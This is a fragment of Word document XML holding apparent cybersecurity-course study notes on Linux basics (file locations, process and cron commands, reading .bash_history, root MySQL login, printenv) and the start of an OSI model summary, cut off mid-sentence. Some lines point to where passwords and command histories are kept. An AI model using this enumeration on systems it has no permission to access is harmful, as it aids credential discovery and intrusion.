      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow – has all the passwords of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20597579" w14:textId="06E8E8A7" w:rsidR="00944F26" w:rsidRPr="0084205E" w:rsidRDefault="00944F26" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/group – all groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D57AA9" w14:textId="021540A8" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – every file inside gets deleted upon shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E168C" w14:textId="5AC981C5" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used to control the sudo permissions of every </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F844877" w14:textId="70A3AF33" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>home</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – user directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52851DF4" w14:textId="4156BAC5" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – where user software is installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747E891" w14:textId="2E4D06A1" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used for system critical files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C041465" w14:textId="08DDACBA" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> misc. directory</w:t>
      </w:r>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LOGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC95086" w14:textId="2C892229" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$PATH – stores all the binaries you’re able to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F04D0C" w14:textId="4DA362A6" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">” command – list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> created processes can be viewed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C4DC7" w14:textId="2F1D0907" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” flag for all system processes – PIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE65FDC" w14:textId="3FE13E26" w:rsidR="00CE33D7" w:rsidRPr="0084205E" w:rsidRDefault="00CE33D7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use kill command – kill&lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A1790" w14:textId="4063AA20" w:rsidR="00873317" w:rsidRPr="0084205E" w:rsidRDefault="00873317" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“top” command – shows what processes are taking up the most system resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8271BB" w14:textId="4CD3324D" w:rsidR="00A8335A" w:rsidRPr="0084205E" w:rsidRDefault="00A8335A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D9B5F" w14:textId="199C4E56" w:rsidR="00A8335A" w:rsidRPr="0084205E" w:rsidRDefault="00A8335A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
        <w:t xml:space="preserve">Bash history </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> found via ls -la </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> cat to open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75EF7E" w14:textId="473D2BE2" w:rsidR="00A8335A" w:rsidRPr="0084205E" w:rsidRDefault="00A8335A" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
        <w:t xml:space="preserve">Cronjob </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> crontab -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C95658" w14:textId="4AA0D4B7" w:rsidR="002D6690" w:rsidRPr="0084205E" w:rsidRDefault="002D6690" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
        <w:t>Hosts file in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D4D65" w14:textId="123D2696" w:rsidR="00A403FF" w:rsidRPr="0084205E" w:rsidRDefault="00A403FF" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Alias command </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> stored </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="005D2BF3" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> custom alias = answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFDFAC5" w14:textId="682EE4AD" w:rsidR="005D2BF3" w:rsidRPr="0084205E" w:rsidRDefault="005D2BF3" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">MOTDs </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/update-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>motd.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE7BAE" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>00-header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70839295" w14:textId="12692AA3" w:rsidR="005D2BF3" w:rsidRPr="0084205E" w:rsidRDefault="005D2BF3" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Finding information about the system – like kernel version – cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/*release</w:t>
      </w:r>
      <w:r w:rsidR="004B4852" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (once inside /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B4852" w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B4852" w:rsidRPr="0084205E">
        <w:t>/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67956191" w14:textId="68E33338" w:rsidR="004B4852" w:rsidRPr="0084205E" w:rsidRDefault="004B4852" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Media – directory for mounted files – removable hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30E3C0" w14:textId="12136A77" w:rsidR="009D3A64" w:rsidRPr="0084205E" w:rsidRDefault="009D3A64" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CONVERTING HEX TO ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8223D" w14:textId="570D343F" w:rsidR="009D3A64" w:rsidRPr="0084205E" w:rsidRDefault="009D3A64" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007B2E7E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Cat &lt;file&gt; | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B2E7E" w:rsidRPr="0084205E">
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B2E7E" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -r -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A3638" w14:textId="66B239FA" w:rsidR="007B2E7E" w:rsidRPr="0084205E" w:rsidRDefault="0016288C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Curl localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6725E1" w14:textId="36F808C5" w:rsidR="0016288C" w:rsidRPr="0084205E" w:rsidRDefault="0016288C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MYSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64754CF3" w14:textId="20320436" w:rsidR="0016288C" w:rsidRPr="0084205E" w:rsidRDefault="0016288C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF74034" w14:textId="094C3602" w:rsidR="0016288C" w:rsidRPr="0084205E" w:rsidRDefault="0016288C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Show </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>databases;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4BC09A9B" w14:textId="0D7863B9" w:rsidR="0016288C" w:rsidRPr="0084205E" w:rsidRDefault="0016288C" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidR="00883EDE" w:rsidRPr="0084205E">
        <w:t>&lt;database</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00883EDE" w:rsidRPr="0084205E">
        <w:t>&gt;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E9663D5" w14:textId="4CC37074" w:rsidR="00883EDE" w:rsidRPr="0084205E" w:rsidRDefault="00883EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Select * from &lt;tables</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00BDFCC5" w14:textId="64F9253C" w:rsidR="00883EDE" w:rsidRPr="0084205E" w:rsidRDefault="00883EDE" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Printenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00944F26" w:rsidRPr="0084205E">
        <w:t>find system variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516681B" w14:textId="354E62B3" w:rsidR="00944F26" w:rsidRPr="0084205E" w:rsidRDefault="00944F26" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Home/&lt;user&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/.profile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> personal $PATH’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2D3BB4" w14:textId="766FB203" w:rsidR="00944F26" w:rsidRPr="0084205E" w:rsidRDefault="00944F26" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A39DB86" w14:textId="34DA3EFA" w:rsidR="006B0620" w:rsidRPr="0084205E" w:rsidRDefault="006B0620" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Intro to Networking</w:t>
      </w:r>
      <w:r w:rsidR="007E5776" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – CISCO Self Study Guide by Steve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E5776" w:rsidRPr="0084205E">
        <w:t>McQuerry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0937D285" w14:textId="7FB3E331" w:rsidR="006B0620" w:rsidRPr="0084205E" w:rsidRDefault="006B0620" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OSI Model</w:t>
      </w:r>
      <w:r w:rsidR="00694F2F" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – Open Systems Interconnection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6042C" w14:textId="58A2ED4B" w:rsidR="006B0620" w:rsidRPr="0084205E" w:rsidRDefault="00694F2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 7 – Application – networking options to programs running on a computer. Exclusive to applications, interface to transmit data. Data given to application layer goes to presentation layer</w:t>
      </w:r>
      <w:r w:rsidR="006A4F0B" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006A4F0B" w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Accepts communication requests from applications. – FTP protocol communicates with this layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705F685" w14:textId="3CC403ED" w:rsidR="00694F2F" w:rsidRPr="0084205E" w:rsidRDefault="00694F2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 6 – Presentation – receives data from the Application layer. Translates data into standardized format. Handles encryption, compression, or other transformations to data. Data then passed to session layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D773F6" w14:textId="388183B9" w:rsidR="00694F2F" w:rsidRPr="0084205E" w:rsidRDefault="00694F2F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Layer 5 – Session </w:t>
      </w:r>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">looks to setup connection to other computer across the network, otherwise it sends back an error. Session layer must maintain connection and synch with session layer of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t>other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> computer. Session created is unique to communication, allowing multiple requests to be made to multiple endpoints simultaneously without data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t>mixup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B668E5" w:rsidRPr="0084205E">
        <w:t>. Once session successfully logged, data is passed down to transport layer</w:t>
      </w:r>
      <w:r w:rsidR="006A4F0B" w:rsidRPr="0084205E">
